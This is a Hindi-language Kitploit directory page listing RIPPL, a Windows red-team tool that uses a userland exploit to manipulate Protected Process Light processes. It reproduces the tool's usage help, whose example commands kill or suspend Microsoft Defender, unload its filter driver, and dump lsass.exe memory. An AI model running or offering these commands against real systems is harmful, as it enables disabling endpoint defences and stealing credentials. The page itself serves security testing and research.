Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RIPPL — RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows | Kitploit
उपकरण/GitHubGitHub/last-byte/rippl
Privilege EscalationExploitationPost-ExploitationRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL is a tool that abuses a usermode only exploit to manipulate PPL processes on Windows

रिपॉजिटरी देखें
714 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RIPPL

ड्राइवर का उपयोग किए बिना PPL संरक्षित प्रक्रियाओं में हेरफेर करना

defender funny

यह टूल Windows PPL संरक्षित प्रक्रियाओं में हेरफेर करने के लिए एक userland एक्सप्लॉइट लागू करता है। इस तकनीक पर प्रारंभिक रूप से James Forshaw (उर्फ @tiraniddo) और Clément Labro (उर्फ @itm4n) ने निम्नलिखित ब्लॉगपोस्ट्स में चर्चा की थी।

  • James Forshaw का ब्लॉगपोस्ट: Windows एक्सप्लॉइटेशन ट्रिक्स
  • Clément Labro का ब्लॉगपोस्ट भाग #1: क्या आप वास्तव में LSA सुरक्षा (RunAsPPL) के बारे में जानते हैं?
  • Clément Labro का ब्लॉगपोस्ट भाग #2: Userland में LSA सुरक्षा को बायपास करना

उपयोग

चेतावनी: बाइनरी का सुरक्षित संस्करण कभी भी कुछ भी आउटपुट नहीं करता, क्योंकि सभी स्ट्रिंग्स और प्रिंट फ़ंक्शन को कंडीशनल कंपाइलेशन मैक्रोज़ का उपयोग करके हटा दिया जाता है।

बस बिना किसी तर्क के एक्ज़िक्यूटेबल चलाएँ और आपको विस्तृत सहायता/उपयोग मिलेगा (केवल उन बाइनरी के लिए मान्य जो OPSEC मैक्रो को परिभाषित किए बिना संकलित की गई हैं)।

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
टूल डाउनलोड करें